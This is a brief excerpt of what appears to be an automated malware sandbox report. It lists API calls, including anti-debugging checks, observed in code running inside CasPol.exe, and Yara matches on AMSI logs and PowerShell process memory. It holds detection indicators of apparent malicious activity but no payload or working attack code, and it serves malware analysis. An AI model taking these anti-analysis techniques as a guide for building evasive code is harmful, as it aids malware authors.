Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_10002B1C

Source: Yara match	File source: amsi32_3824.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR